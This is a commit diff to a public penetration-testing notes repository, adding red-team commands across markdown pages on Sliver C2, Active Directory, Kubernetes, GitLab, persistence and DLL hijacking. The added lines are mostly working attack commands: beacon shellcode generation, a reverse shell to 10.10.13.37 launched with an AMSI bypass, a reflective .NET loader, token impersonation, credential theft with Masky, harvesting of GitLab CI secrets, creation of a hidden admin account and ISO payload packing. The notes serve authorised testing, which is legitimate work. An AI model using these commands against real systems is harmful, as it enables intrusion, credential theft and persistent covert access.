[AHK] Automatic update 👽

pentest/c2/sliver.md

@@ -49,6 +49,7 @@ $ sudo /root/sliver-server operator --name snovvcrash-kali-home --lhost <PRIVATE
 A redirector-aware pair of payload and listener (when redirecting to `PRIVATE_IP:8443`):
 
 ```
-sliver > generate --os windows --arch amd64 --format shellcode [--evasion] --http example.com:443 [--limit-datetime "Thu, 01 Jan 1970 00:00:00 MSK"] [--limit-domainjoined] [--limit-hostname VICTIM-PC] [--limit-username victim.user] --name victimpc --save /home/snovvcrash/www/shellcode.bin
+sliver > generate [beacon] [--sleep 7] [--jitter 5] --os windows --arch amd64 --format shellcode [--evasion] --http example.com:443 [--limit-datetime "Thu, 01 Jan 1970 00:00:00 MSK"] [--limit-domainjoined] [--limit-hostname VICTIM-PC] [--limit-username victim.user] --name victimpc --save /home/snovvcrash/www/shellcode.bin
+
 sliver > https --domain example.com --lhost <PRIVATE_IP> --lport 8443
 ```

pentest/infrastructure/ad/README.md

@@ -439,7 +439,12 @@ $ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x "powershell -enc `echo -n
 Bypass execution restrictions of EDRs monitoring for `WmiPrvSE.exe` misbehavior with [dotnetassembly](https://github.com/snovvcrash/CrackMapExec/tree/dotnetassembly) options:
 
 ```
+$ wget https://github.com/snovvcrash/CrackMapExec/raw/dotnetassembly/cme/protocols/smb.py -O ~/.local/pipx/venvs/crackmapexec/lib/python3.10/site-packages/cme/protocols/smb.py
+
 $ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'Seatbelt.exe -group=user' --dotnetassembly --dotnetassembly-names 'Rubeus,Program,MainString' --dotnetassembly-arg-type string --amsi-bypass amsi.ps1 --codec cp866
+
+$ stty raw -echo; (stty size; cat) | nc -lvnp 1337
+$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'Invoke-ConPtyShell.ps1 Invoke-ConPtyShell 10.10.13.37 1337' --amsi-bypass amsi.ps1 --no-output
 ```
 
 

pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly.md

@@ -57,6 +57,38 @@ function Invoke-S0m3B1n4ry
 {% endcode %}
 
 
+## IronPython Loader
+
+- [https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader](https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader)
+- [https://github.com/IronLanguages/ironpython3/releases](https://github.com/IronLanguages/ironpython3/releases)
+- [https://github.com/BC-SECURITY/Empire/blob/master/empire/server/stagers/CSharpPy.yaml](https://github.com/BC-SECURITY/Empire/blob/master/empire/server/stagers/CSharpPy.yaml)
+
+You will need:
+
+* ipy.exe
+* IronPython.dll
+* Microsoft.Dynamic.dll
+* Microsoft.Scripting.dll
+* System.Memory.dll
+* System.Runtime.CompilerServices.Unsafe.dll
+
+{% code title="loader.py" %}
+```python
+# ipy.exe .\loader.py
+
+import clr
+
+clr.AddReference('System')
+from System import *
+from System.Reflection import *
+
+assembly = Assembly.LoadFrom('C:\\Tools\\Loader.exe')
+type = assembly.GetType('Loader.Program')
+type.GetMethod('Main').Invoke(Activator.CreateInstance(type), None)
+```
+{% endcode %}
+
+
 
 
 ## C\# to Unmanaged DLL

pentest/infrastructure/ad/lateral-movement/rdp.md

@@ -85,6 +85,7 @@ PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\termin
 
 ## Hijack RDP Sessions
 
+- [http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html](http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html)
 - [https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement](https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement)
 - [https://qtechbabble.wordpress.com/2017/04/07/use-quser-to-view-which-accounts-are-logged-inremoted-in-to-a-computer/](https://qtechbabble.wordpress.com/2017/04/07/use-quser-to-view-which-accounts-are-logged-inremoted-in-to-a-computer/)
 

pentest/infrastructure/ad/token-manipulation.md

@@ -7,6 +7,8 @@
 - [https://xret2pwn.github.io//Building-Token-Vault-Part0x02/](https://xret2pwn.github.io//Building-Token-Vault-Part0x02/)
 - [[PDF] Technical Analysis of Access Token Theft and Manipulation (McAfee)](https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf)
 
+![Access Token Theft and Manipulation (McAfee)](/.gitbook/assets/011.png)
+
 
 
 
@@ -49,9 +51,34 @@ PS > $impToken.Groups
 - [https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/](https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/)
 - [https://github.com/S3cur3Th1sSh1t/SharpImpersonation](https://github.com/S3cur3Th1sSh1t/SharpImpersonation)
 
+```
+PS > .\SharpImpersonation.exe list [elevated]
+PS > .\SharpImpersonation.exe list user:PC01\snovvcrash binary:"powershell.exe whoami"
+PS > .\SharpImpersonation.exe list user:PC01\snovvcrash technique:ImpersonateLoggedOnuser
+```
+
 
 
 ### Koh
 
 - [https://posts.specterops.io/koh-the-token-stealer-41ca07a40ed6](https://posts.specterops.io/koh-the-token-stealer-41ca07a40ed6)
 - [https://github.com/GhostPack/Koh](https://github.com/GhostPack/Koh)
+
+
+
+### Masky
+
+- [https://z4ksec.github.io/posts/masky-release-v0.0.3/](https://z4ksec.github.io/posts/masky-release-v0.0.3/)
+- [https://github.com/Z4kSec/Masky](https://github.com/Z4kSec/Masky)
+- [https://threadreaderapp.com/thread/1563247630129725442.html](https://threadreaderapp.com/thread/1563247630129725442.html)
+
+Combining with AD CS abuse:
+
+{% content-ref url="/pentest/infrastructure/ad/ad-cs-abuse/README.md" %}
+[README.md](README.md)
+{% endcontent-ref %}
+
+```
+$ pipx install -f 'git+https://github.com/Z4kSec/Masky.git'
+$ masky -d tinycorp -u snovvcrash -p 'Passw0rd!' -ca 'CA01.megacorp.local\CorpCA' -dc-ip 192.168.1.11 10.10.13.37
+```

pentest/infrastructure/devops/containerization-orchestration.md

@@ -48,6 +48,55 @@ $ kubectl apply -f evilpod.yml
 $ kubectl exec --stdin --tty -it evilpod -- chroot /hostfs bash
 ```
 
+### Kubernetes API Server Paths
+
+Check these kube-apiserver paths for anonymous access (stolen from [HackTricks](https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside#kube-apiserver-anonymous-access)):
+
+```
+/api
+/api/v1
+/apis
+/apis
+/apis/admissionregistration.k8s.io
+/apis/admissionregistration.k8s.io/v1beta1
+/apis/apiextensions.k8s.io
+/apis/apiextensions.k8s.io/v1beta1
+/apis/apiregistration.k8s.io
+/apis/apiregistration.k8s.io/v1
+/apis/apiregistration.k8s.io/v1beta1
+/apis/apps
+/apis/apps/v1
+/apis/apps/v1beta1
+/apis/apps/v1beta2
+/apis/authentication.k8s.io
+/apis/authentication.k8s.io/v1
+/apis/authentication.k8s.io/v1beta1
+/apis/authorization.k8s.i
+/apis/authorization.k8s.io/v1
+/apis/authorization.k8s.io/v1beta1
+/apis/autoscaling
+/apis/autoscaling/v1
+/apis/autoscaling/v2beta1
+/apis/batch
+/apis/batch/v1
+/apis/batch/v1beta1
+/apis/certificates.k8s.io
+/apis/certificates.k8s.io/v1beta1
+```
+
+
+
+### Tools
+
+
+#### kube-hunter
+
+- [https://github.com/aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter)
+
+```
+$ kube-hunter --cidr 10.0.1.0/24 --active
+```
+
 
 
 ### Training Labs

pentest/infrastructure/devops/gitlab.md

@@ -3,6 +3,9 @@
 - [https://devcraft.io/assets/hacktivitycon-slides.pdf](https://devcraft.io/assets/hacktivitycon-slides.pdf)
 - [https://github.com/dotPY-hax/gitlab_RCE](https://github.com/dotPY-hax/gitlab_RCE)
 
+
+
+
 ## Search for Secrets
 
 - [https://embracethered.com/blog/posts/2022/hacking-gitlab-servers/](https://embracethered.com/blog/posts/2022/hacking-gitlab-servers/)
@@ -12,17 +15,17 @@ Search for CI/CD variables and runner tokens:
 
 ```bash
 TOKEN=`cat token`
-GITLAB=gitlab.local
+GITLAB=gitlab.megacorp.local
 API="https://$GITLAB/api/v4"
 
 curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq
 
 # 1. bash get_project_ids.sh <PAGE_NUMBER> | tee -a projects
-curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r .[].id
+curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id'
 
 # 2. bash get_secrets.sh
 for id in `cat projects`; do
-    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq .path
+    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path'
 
     curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq
 
@@ -40,6 +43,14 @@ $ gitleaks detect -s . -v | jq '.Match + " :: " + .File'
 
 
 
+## GitLab Runners Abuse
+
+- [https://frichetten.com/blog/abusing-gitlab-runners/](https://frichetten.com/blog/abusing-gitlab-runners/)
+- [https://github.com/Frichetten/gitlab-runner-research](https://github.com/Frichetten/gitlab-runner-research)
+
+
+
+
 ## SSRF > Redis > RCE (CE/EE)
 
 **CVE-2018-19571, CVE-2018-19585**

pentest/infrastructure/persistence.md

@@ -19,6 +19,9 @@
 
 ### Hidden Local User
 
+- [https://github.com/3gstudent/Windows-User-Clone](https://github.com/3gstudent/Windows-User-Clone)
+- [https://github.com/wgpsec/CreateHiddenAccount](https://github.com/wgpsec/CreateHiddenAccount)
+
 
 #### Dollar Sign
 
@@ -37,6 +40,18 @@ PS > New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
 ```
 
 
+#### Suborner
+
+- [https://r4wsec.com/notes/the_suborner_attack/](https://r4wsec.com/notes/the_suborner_attack/)
+- [https://github.com/r4wd3r/Suborner](https://github.com/r4wd3r/Suborner)
+
+```
+PS > whoami
+nt authority\system
+PS > .\Suborner.exe /username:snovvcrash$ /password:Passw0rd!
+```
+
+
 
 ### COM Hijacking
 

redteam/maldev/dll-hijacking.md

@@ -361,7 +361,7 @@ $link.save()
 Pack all the files into an ISO with [PackMyPayload](https://github.com/mgeeky/PackMyPayload):
 
 ```
-PS > python .\PackMyPayload.py C:\out\ C:\out\openme.iso --out-format iso --hide OneDrive.Update,OneDriveStandaloneUpdater.exe,version.dll,vresion.dll
+PS > python .\PackMyPayload.py C:\out\ C:\out\mountme.iso --out-format iso --hide OneDrive.Update,OneDriveStandaloneUpdater.exe,version.dll,vresion.dll
 ```